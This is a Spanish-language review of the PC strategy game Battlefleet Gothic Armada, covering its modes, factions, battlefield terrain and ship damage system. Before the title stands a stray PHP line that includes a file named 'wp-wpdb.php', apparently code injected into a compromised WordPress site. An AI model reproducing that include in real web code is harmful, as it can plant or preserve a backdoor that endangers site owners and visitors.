if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Battlefleet Gothic Armada – La Fortaleza de LeChuck

Análisis Battlefleet Gothic Armada

Durante este último año no han sido pocos los juegos de especialista de Games Workshop los que se han adaptado y convertido en videojuegos, y los que aún faltan por venir, en esta ocasión vamos a hablar de la adaptación de PC de uno de los juegos de especialista más jugados del universo de Warhammer 40.000, Battlefleet Gothic Armada.

Battlefleet Gothic Armada

Para aquellos que no sepan nada de este universo, nos encontramos en un futuro distópico en el año 40.000 donde los conflictos y la guerra están a la orden del día entre las numerosas razas que buscan sobrevivir o ampliar su vasto imperio, mientras Warhammer 40.000 se centra en conflictos en campos de batalla a nivel planetario, Battlefleet Gothic recrea los combates entre ejércitos que tienen lugar en el espacio profundo, Armada es un juego de estrategia espacial a tiempo real en el que el jugador toma el control de una pequeña flota espacial entre las 5 razas disponibles actualmente.

El juego corre en el Unreal Engine 4 y aunque no llegue a ser un portento gráfico las cámaras bien colocadas, captar el momento exacto de un choque o una gran explosión hacen que el juego sea muy agradable a la vista y se hace bastante espectacular cuando se juntan 5 o 6 naves en un mismo sitio.

MODOS DE JUEGO

Battlefleet Gothic Armada cuenta con un modo campaña donde solo podremos controlar a las fuerzas de imperio, nuestra misión será la de detener las fuerzas de Abbadon el Saqueador y evitar que este se haga con los dos objetos de una profecía que le darán el poder de controlar todo el sector, al principio controlaremos un numero bastante limitado de fuerzas, pero conforme vayamos avanzando en la historia iremos desbloqueando diferentes tipos de naves y habilidades junto con los diferentes generales y capitanes que forman parte de esta campaña.

En la campaña iremos adquiriendo experiencia de forma individual con cada nave al más puro estilo XCOM, con cada nivel extra nuestras habilidades irán mejorando para volverse más efectivas y además nuestro navío irá creciendo y fortaleciéndose. Hay una opción llamada Hombre de Hierro en la que nuestras naves morirán y se eliminarán de la historia en el caso de que hayan sido destruidas en una batalla, un modo complicado para los principiantes pero que añade un buen punto de dificultad para aquellos que quieren nuevos retos.

Battlefleet Gothic Armada

El juego también tiene dos tipos de escaramuzas, por un lado tenemos las escaramuzas personalizadas donde lucharemos contra la máquina, las fuerzas disponibles serán las de las 5 razas jugables que hay ahora mismo más las que vendrán en un futuro, podremos elegir una armada ya hecha por la máquina o elegir la nuestra propia la cual puede subir de nivel y mejorar de la misma forma que pasa en la campaña, haciendo posible crearnos nuestra flota personalizada con cada raza desde cero.

Por otro lado tenemos las partidas multijugador donde lucharemos contra otro jugador de cualquier parte del mundo y el sistema de armada funciona exactamente igual que en las escaramuzas personalizadas, solo que para evitar que alguien con un comandante muy avanzado te destruya sin esfuerzo el juego tiene un sistema de compensación para que las partidas sean lo más igualadas posible.

LAS RAZAS

Battlefleet Gothic Armada cuenta actualmente con 5 razas disponibles entre las que tenemos las fuerzas Imperiales que se dividen en la Armada Imperial y los Marines Espaciales, la Flota del Caos y las fuerzas Xeno donde tenemos por un lado a los Piratas Orkos y por otro a los Corsarios Eldar, cada facción tiene habilidades y cualidades únicas que cambian la forma de jugar de cada una de manera drástica, por ejemplo los Eldars tienen las naves más rápidas y ligeras de todas mientras que los Imperiales tienen las naves más lentas, esto afecta a su capacidad de movimiento, maniobrabilidad y a la forma que tienen de encararse para atacar.

Además de ciertas cualidades generales algunas facciones como los Orkos o el Caos son muy personalizables, en el caso de los Orkos cada parte de sus naves puede cambiarse y adaptarse en función de las necesidades y en el caso del Caos es posible consagrar su armada a cualquiera de los 4 dioses oscuros cambiando así su estética y sus habilidades.

Otro detalle importante es la moral, es decir, la capacidad que tiene cada raza de mantener la sangre fría en combate, en el caso de ser muy disciplinados no habrá incidencias en las naves, pero en el caso de ser tan estrictos, como pasa con los Orkos, el Caos y en raras ocasiones con el Imperio, es muy posible que cuando las cosas empiecen a ir mal haya amotinamientos y peleas internas haciendo que la nave pierda efectividad hasta que se solucione el conflicto.

Además de todas estas hay planes para que los Tau y los Necrones aparezcan en un futuro en forma de DLC, pueden parecer pocas razas así de primeras pero la intención de Tindalos ha sido la de recrear lo mejor posible al juego de mesa donde no había muchas más.

EL CAMPO DE BATALLA

El escenario tiene una gran importancia estratégica, podremos encontrar diversos elementos naturales del espacio como un cúmulo de asteroides, que harán daño a cualquier nave que pase a través o incluso se pueden usar a modo de escudo ya que es capaz de detener proyectiles enemigos, grandes nubes de gas, donde poder escondernos en el caso de querer preparar una emboscada o como escondite a la hora de huir, pequeñas minas anti blindaje que han acabado allí por batallas anteriores y también podremos usar los restos de las naves destruidas en esa batalla como obstáculos entre otras muchas cosas.

Battlefleet Gothic Armada

Todos estos elementos podrán o no moverse en función del tipo de escenario en el que nos encontremos, si no hay ninguna estrella o planeta estos elementos permanecerán inmóviles, pero en el caso de que si que haya algún astro cerca estos elementos se irán moviendo muy lentamente en función de la gravedad del planeta, haciendo que las batallas cobren otra dimensión

La particularidad de Battlefleet Gothic Armada es que las naves se dividen por secciones, cada una de estas secciones tiene una finalidad, por ejemplo tenemos por un lado los motores, los cañones laterales, las torres de comunicación…etc, cada nave tendrá una barra de vida general y otras tantas para las secciones individuales, cada vez que una sección sea impactada la vida de esta se verá reducida y en el caso de llegar a 0 quedará inutilizada, esto implica que en el caso de ser un arma no podremos disparar con ella o en el caso de que sean los sensores o la torre de comunicaciones no podremos localizar al enemigo a no ser que esté a muy corta distancia, muchas veces la gran mayoría de las secciones sobreviven antes de que la nave se destruya por completo, pero se puede dar el caso de que todas las secciones queden destruidas y la nave se quede a muy poca vida, en esa situación la nave no tendrá mas remedio que permanecer a la deriva esperando que alguien la destruya o que se impacte contra algo.

Battlefleet Gothic Armada

En resumen, Tindalos ha hecho un magnífico trabajo a la hora de recrear este juego de especialista haciéndolo muy fiel al juego de mesa, han mantenido los diferentes elementos de escenario y le han dado una personalidad propia, el problema radica en su complejidad, es un juego del cual hay que tener un conocimiento previo para poder entender la forma de jugar, el juego recrea al detalle la intensidad de las batallas pero al margen de los controles no se nos explica nada más y eso de primeras puede ser confuso.

El sistema de progresión y personalización de armadas es uno de los mejores puntos de este juego ya que te invita a jugar y a mejorar, pero debido a la escasez de tipos de escenario no es un juego al que le vas a dedicar muchas horas seguidas si no tienes amigos con los que jugar. Si en su día jugaste al juego de mesa y te gustó este juego te gustará sin ninguna duda, pero en el caso de no conocer el universo ni de ser fan de la obra de Games Workshop es muy posible que este juego se te atragante un poco ya que es muy posible que se quede apartado a la primera de cambio, es sin duda un juego creado por y para fans.